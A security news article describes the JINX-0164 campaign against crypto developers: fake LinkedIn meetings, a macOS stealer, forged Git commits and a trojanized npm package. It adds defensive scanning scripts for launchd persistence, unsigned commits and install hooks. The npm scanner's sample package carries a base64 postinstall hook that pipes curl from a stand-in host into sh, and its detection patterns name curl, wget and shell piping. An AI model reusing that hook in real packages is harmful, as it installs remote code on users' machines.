GasCope
JINX-0164 hits crypto developers with fake LinkedIn meeting malware

A group of hackers, tracked as JINX-0164, has been reaching out to crypto developers on LinkedIn (because of course it's LinkedIn) and luring them to fake meetings that drop custom macOS malware. The stealer harvests login credentials and access tokens, and the attackers then use those credentials to hijack the pipelines developers use to build and deploy software. Cloud security firm Wiz published its findings on May 27, 2026.

Wiz's incident response team tied the group to attacks going back to at least mid-2025. The pattern: a polished-looking LinkedIn profile, a suggested business call, and a link to a fake site dressed up as Microsoft Teams or a similar conferencing tool. Click the "meeting URL" and the macOS stealer Wiz calls AUDIOFIX quietly begins installing. It runs on both Intel and Apple Silicon Macs and is delivered via a script hosted on a fake Apple page. It persists across reboots, masquerades as a system audio component, and talks to its operators over HTTPS.

Once installed, it pulls saved passwords from the macOS Keychain, browser credentials, SSH keys, cloud access tokens for AWS, GCP, and Azure, and crypto wallet data. Wiz also found the attackers phishing for passwords directly and tucking them into encoded files. (Source: Wiz.)
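A triage check for the persistence described above, as an added example rather than Wiz's detection logic: the page only says the malware survives reboots and poses as an audio component, so the assumption here is the usual macOS mechanism, a launchd job under `LaunchAgents`/`LaunchDaemons`. Apple's own `com.apple.*` jobs ship only under `/System/Library`, so an Apple-style label in a user or `/Library` job directory, or an audio-themed label whose program lives in a user-writable path, is worth a look. The sample plists are constructed for the example.

```python
"""Hunt launchd jobs that pose as Apple audio components.

Added example; not Wiz's tooling. The LaunchAgent persistence path and the
label/path heuristics below are this example's assumptions, not facts from
the Wiz report.
"""
import plistlib
import re
from pathlib import Path

# Apple installs its own com.apple.* jobs only here on modern macOS.
APPLE_JOB_DIRS = ("/System/Library/LaunchAgents", "/System/Library/LaunchDaemons")
# Where a genuine system audio helper would live.
SYSTEM_BINARY_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                          "/bin/", "/sbin/", "/Library/Apple/")
# Locations an unprivileged user (or a dropper running as one) can write.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/",
                          "/var/folders/", "/private/var/folders/")
AUDIO_RE = re.compile(r"audio|sound|speaker|mic", re.I)
# Directories a live hunt walks (third-party and per-user jobs).
HUNT_DIRS = ("/Library/LaunchAgents", "/Library/LaunchDaemons",
             str(Path.home() / "Library/LaunchAgents"))


def inspect_job(plist_bytes, plist_path):
    """Return a list of reasons this launchd job looks like a masquerade."""
    job = plistlib.loads(plist_bytes)
    label = str(job.get("Label", ""))
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    program = str(args[0]) if args else ""
    findings = []
    if label.startswith("com.apple.") and not str(plist_path).startswith(APPLE_JOB_DIRS):
        findings.append(f"com.apple.* label installed outside /System/Library: {plist_path}")
    if program.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program lives in a user-writable location: {program}")
    if AUDIO_RE.search(label) and program and not program.startswith(SYSTEM_BINARY_PREFIXES):
        findings.append(f"audio-themed label but program is not a system binary: {program}")
    # Only worth mentioning once something else is already suspicious.
    if findings and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad+KeepAlive: relaunched at login and restarted if killed")
    return findings


def hunt(dirs=HUNT_DIRS):
    """Inspect every .plist under `dirs`; returns {path: findings} for hits."""
    hits = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                findings = inspect_job(p.read_bytes(), str(p))
            except (OSError, plistlib.InvalidFileException, ValueError):
                continue
            if findings:
                hits[str(p)] = findings
    return hits


# Constructed samples, not artefacts from the Wiz report.
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.apple.audio.coreaudiohelperd",
    "ProgramArguments": ["/Users/dev/Library/Application Support/.audio/coreaudiohelperd",
                         "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
SAMPLE_PATH = "/Users/dev/Library/LaunchAgents/com.apple.audio.coreaudiohelperd.plist"
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Library/Example/updater"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for reason in inspect_job(SAMPLE_PLIST, SAMPLE_PATH):
        print("sample:", reason)
    for path, reasons in hunt().items():
        print(path, *reasons, sep="\n  ")
```

Run it as the affected user and again with sudo so `/Library/LaunchDaemons` is readable; a hit there is worth pulling the binary for analysis before removing the job, since the file itself is the evidence.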

What makes JINX-0164 different from your garden-variety infostealer is the focus on internal code repos and dev infrastructure. In a case study from early 2026, Wiz showed how the attackers used stolen GitHub tokens to pull secrets from CI/CD pipelines with nord-stream, an open-source tool built for extracting secrets from CI/CD systems. They then slipped AUDIOFIX into internal repos, impersonating real developers by forging Git commit metadata (the author name and email in a commit are plain strings and can be set to anything), and either pushed malicious code to main branches or hijacked existing ones. Other developers who pulled and built from the poisoned repos got infected automatically. The org's own dev workflow, in a tidy irony, became the distribution mechanism.

GitHub's vigilant mode, which marks every commit attributed to a user that lacks a verified signature (GPG, SSH, or S/MIME) as "Unverified", caught the impersonation in at least one instance. Without it, a commit whose author field is set to a real developer's name and email is displayed as that developer's work.
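The same check can be run locally over a repository's history, as an added example that is not Wiz's or GitHub's tooling. Git records who pushed a commit only indirectly: the signature status (`%G?`) says whether a key verified it, and the committer identity is often left as the attacker's own when only the author field was forged. The script expects the output of the `git log` command in its docstring; the log lines below are constructed, not from a real repository.

```python
"""Flag commits that claim a trusted identity without a verified signature.

Added example, not Wiz's or GitHub's code. Feed it the output of:
    git log --format='%H%x1f%G?%x1f%an%x1f%ae%x1f%cn%x1f%ce%x1f%s' main
%G? is git's signature status: G good, B bad, U good but untrusted key,
X/Y expired, R revoked, E cannot be checked, N no signature.
"""
import sys
from dataclasses import dataclass

SEP = "\x1f"  # ASCII unit separator, emitted by %x1f in the format string


@dataclass
class Finding:
    sha: str
    reason: str


def parse_git_log(text):
    """Parse the separator-delimited log into dicts; malformed lines are skipped."""
    commits = []
    for line in text.splitlines():
        fields = line.split(SEP)
        if len(fields) != 7:
            continue
        sha, status, an, ae, cn, ce, subject = fields
        commits.append({"sha": sha, "status": status,
                        "author_name": an, "author_email": ae,
                        "committer_name": cn, "committer_email": ce,
                        "subject": subject})
    return commits


def audit_commits(text, trusted_emails):
    """Return findings for commits whose author metadata is not backed by a signature."""
    findings = []
    for c in parse_git_log(text):
        short = c["sha"][:12]
        # A forged author field looks identical to the real thing; only a
        # good signature (G) proves the named developer produced the commit.
        if c["author_email"] in trusted_emails and c["status"] != "G":
            findings.append(Finding(short, f"author {c['author_email']} is a trusted identity "
                                           f"but signature status is {c['status']} (expected G)"))
        if c["status"] == "B":
            findings.append(Finding(short, "signature present but does not verify"))
        # Legitimate rebases also produce this, so treat it as a signal, not proof.
        if (c["author_name"], c["author_email"]) != (c["committer_name"], c["committer_email"]):
            findings.append(Finding(short, f"author {c['author_email']} differs from committer "
                                           f"{c['committer_email']}: pushed by someone else?"))
    return findings


# Constructed sample log (not a real repository): one signed commit, one
# unsigned commit with a forged author, one where the committer differs.
SAMPLE_COMMITS = [
    ("a1b2c3d4e5f60718293a4b5c6d7e8f9012345678", "G", "Alice Dev", "alice@corp.example",
     "Alice Dev", "alice@corp.example", "Bump sdk to 4.9.0"),
    ("0fedcba9876543210fedcba9876543210fedcba9", "N", "Alice Dev", "alice@corp.example",
     "Alice Dev", "alice@corp.example", "Fix audio helper build on arm64"),
    ("1234567890abcdef1234567890abcdef12345678", "N", "Alice Dev", "alice@corp.example",
     "dev", "dev@mail.example", "Merge branch 'feature/audiofix'"),
]
SAMPLE_LOG = "\n".join(SEP.join(c) for c in SAMPLE_COMMITS)
TRUSTED_EMAILS = {"alice@corp.example"}

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for f in audit_commits(text, TRUSTED_EMAILS):
        print(f"{f.sha}  {f.reason}")
```

Signature verification only works if the signing keys are in the local keyring (or `gpg.ssh.allowedSignersFile` is configured for SSH signatures); otherwise good signatures show up as `E` and every trusted author gets flagged, which is noisy but fails closed.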

The group also pulled off a confirmed supply chain attack on a public npm package. On April 7, 2026, JINX-0164 trojanized version 4.9.1 of @velora-dex/sdk, slipping in a base64-encoded command that fetched and executed a remote script deploying MINIRAT, a lightweight Go-based backdoor built for persistence and remote command execution.
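A scanner for the trick described above, as an added example that is not Wiz's tooling and not the `@velora-dex/sdk` code: the assumption is that the base64-encoded command ran from an npm lifecycle hook (`preinstall`/`install`/`postinstall`/`prepare`), which is where npm executes arbitrary commands during `npm install`. The script flags decoding primitives in such hooks, then decodes any base64 runs it finds and reports what they actually do. The `package.json` and payload are constructed for the example.

```python
"""Find npm install hooks that decode and run hidden commands.

Added example; not Wiz's tooling and not the trojanized package's code.
The lifecycle-hook delivery path is this example's assumption.
"""
import base64
import json
import re
import sys

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Decoding primitives that have no business in an install hook.
DECODER_RE = re.compile(r"base64|atob\(|Buffer\.from\(", re.I)
# Behaviour worth reporting when it shows up inside a decoded blob.
FETCH_EXEC_RE = re.compile(
    r"https?://|curl |wget |child_process|execSync|spawn\(|\| *sh\b|\| *bash\b|eval\(", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(text):
    """Return the printable strings hidden in base64 runs inside `text`."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text once decoded
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            found.append(decoded)
    return found


def scan_package_json(text):
    """Return findings for lifecycle hooks that decode or execute hidden commands."""
    pkg = json.loads(text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        if DECODER_RE.search(cmd):
            findings.append({"hook": hook,
                             "reason": "install hook decodes obfuscated data",
                             "evidence": cmd})
        for blob in decode_blobs(cmd):
            if FETCH_EXEC_RE.search(blob):
                findings.append({"hook": hook,
                                 "reason": "decoded payload fetches or executes code",
                                 "evidence": blob})
    return findings


# Constructed sample: a fake package whose postinstall hook evals a base64
# blob that pulls and runs a remote script. The URL is invalid on purpose.
PAYLOAD = ("require('child_process').execSync("
           "'curl -fsSL https://updates.example.invalid/a.sh | sh')")
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "@example/sdk",
    "version": "4.9.1",
    "scripts": {
        "build": "tsc -p .",
        "prepare": "npm run build",
        "postinstall": f"node -e \"eval(Buffer.from('{ENCODED}','base64').toString())\"",
    },
})

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PACKAGE_JSON
    for f in scan_package_json(text):
        print(f"[{f['hook']}] {f['reason']}\n    {f['evidence']}")
```

Point it at `node_modules/*/package.json` after a fresh install to review what actually ran; `npm install --ignore-scripts` prevents the hooks from executing at all, which is the safer default for CI runners holding cloud or registry tokens.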

AUDIOFIX and MINIRAT share command-and-control domains including datahub[.]ink, cloud-sync[.]online, and byte-io[.]us. The attackers route their activity through Mullvad VPN, Astrill VPN, and ExpressVPN to obscure their real location. Wiz spotted tactical similarities with North Korean clusters UNC1069 and Sapphire Sleet, but no direct infrastructure overlap. JINX-0164 is being labeled a distinct, financially motivated threat actor.

In May, attackers compromised 170+ npm and PyPI packages, including the official Mistral AI Python library. That campaign exposed GitHub tokens and cloud credentials belonging to crypto and AI developers. It was also the first documented case of malicious packages carrying valid SLSA Build Level 3 provenance attestations. That does not mean the cryptography failed: provenance proves only that a given builder produced the artifact from a given source, so if the attacker controls the source or the build trigger through stolen tokens, the attestation is genuine and the package is still malicious. Provenance verifies how something was built, not whether what went into the build was trustworthy.

Targeting crypto and AI developers tends to pay, in both cash and code. Crypto labs and companies should tighten their security posture and audit CI/CD pipelines for unauthorized access or suspicious activity. Rogue GitHub Actions workflows, commits with unverified signatures, and logins from commercial VPN exit nodes are all red flags. Any developer who joined a meeting sent via LinkedIn should treat the machine as compromised: check it for persistence posing as an audio component, and rotate and revoke every credential it held, including Keychain passwords, SSH keys, cloud tokens, and GitHub tokens.

Publisher: gascope.com